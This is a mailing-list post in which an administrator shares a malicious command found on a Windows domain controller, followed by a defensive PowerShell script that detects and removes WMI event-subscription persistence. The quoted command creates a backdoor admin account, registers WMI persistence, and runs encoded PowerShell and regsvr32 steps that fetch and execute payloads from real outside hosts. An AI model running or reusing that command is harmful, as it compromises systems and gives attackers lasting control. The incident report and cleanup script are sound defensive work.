Snort mailing list archives

Bykn - Service on Windows Domain Controller


From: Prakash Kumar N via Snort-users <snort-users () lists snort org>
Date: Mon, 1 Apr 2019 12:40:22 +0530

Hi,

Today I'm seeing an unusual service running on one of our Windows
2012R2 DCs; I suspect some kind of external attack [ransomware]. Does
somebody have any idea about this...?

cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators
admin$ /ad&net1 localgroup administradores admin$ /ad&wmic
/NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3"
DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer
WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH
CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic
/NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE
Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic
/NAMESPACE:"\root\subscription" PATH __EventFilter CREATE
Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL",
Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic
/NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE
Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc
"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe
IEX (New-Object system.Net.WebClient).DownloadString('
http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object
system.Net.WebClient).DownloadString('
http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object
system.Net.WebClient).DownloadString('
http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:
http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:
http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:
http://35.182.171.137/3.txt scrobj.dll"&wmic
/NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE
Filter="__EventFilter.Name="fuckyoumm3"",
Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u
/n /i:http://173.208.172.202:8888\s1.txt scrobj.dll

-- 
Thanks,
*PRAKASH KUMAR.N*
Mail: prakashkumar.n () gmail com* | *prakashkumar.n () live in
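The command posted above registers a permanent WMI event subscription (an __EventFilter bound through a __FilterToConsumerBinding to a CommandLineEventConsumer) so that the download-and-execute stage is re-run on a timer without any service binary on disk. One way to check a host for that kind of persistence, as an added example that is not part of the original post and not Snort's code: it lists every binding in root\subscription, flags consumers whose command matches traits of the posted one, and optionally removes them. The -Remove switch and the Get-RefName helper are this script's own; it assumes an elevated PowerShell session on the affected host.

```powershell
# Added example, not from the original post: enumerate permanent WMI event
# subscriptions in root\subscription and flag bindings whose consumer runs the
# kind of command the attacker registered (encoded PowerShell, regsvr32
# /i:http... scrobj.dll). Run elevated on the affected host.
# -Remove is this script's own (assumed) parameter, not a built-in switch.
param([switch]$Remove)

$ns = 'root\subscription'
# Command-line traits taken from the posted command; extend as you see fit.
$pattern = 'powershell(\.exe)?\s+-nop\s+-enc|regsvr32\b.*?/i:http|scrobj\.dll|DownloadString'

# Reference properties come back as strings under Get-WmiObject and as
# CimInstance objects under Get-CimInstance; handle both (assumed helper).
function Get-RefName($ref) {
    if ($ref -is [string]) { return ($ref -replace '^.*Name="([^"]*)".*$', '$1') }
    return $ref.Name
}

$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
$consumers = foreach ($cls in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer') {
    Get-CimInstance -Namespace $ns -ClassName $cls -ErrorAction SilentlyContinue
}
$bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

foreach ($b in $bindings) {
    $fName = Get-RefName $b.Filter
    $cName = Get-RefName $b.Consumer
    $f = $filters   | Where-Object { $_.Name -eq $fName }
    $c = $consumers | Where-Object { $_.Name -eq $cName }
    # CommandLineEventConsumer carries CommandLineTemplate, ActiveScriptEventConsumer ScriptText.
    $cmd = @($c.CommandLineTemplate, $c.ScriptText) -join ''
    $hit = [bool]($cmd -match $pattern)

    [pscustomobject]@{
        Filter     = $fName
        Query      = $f.Query
        Consumer   = "$($c.CimClass.CimClassName)/$cName"
        Command    = $cmd
        Suspicious = $hit
    } | Format-List

    if ($hit -and $Remove) {
        # Drop the binding first so the consumer cannot fire while the rest is removed.
        $b | Remove-CimInstance
        if ($c) { $c | Remove-CimInstance }
        if ($f) { $f | Remove-CimInstance }
        Write-Host "Removed subscription $fName -> $cName"
    }
}
```

Without -Remove the script only reports; seeing the names from the posted command (fuckyoumm3 bound to fuckyoumm4) in its output confirms the host still carries that subscription, and a WITHIN 10800 query on Win32_PerfFormattedData_PerfOS_System means the consumer re-fires roughly every three hours.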
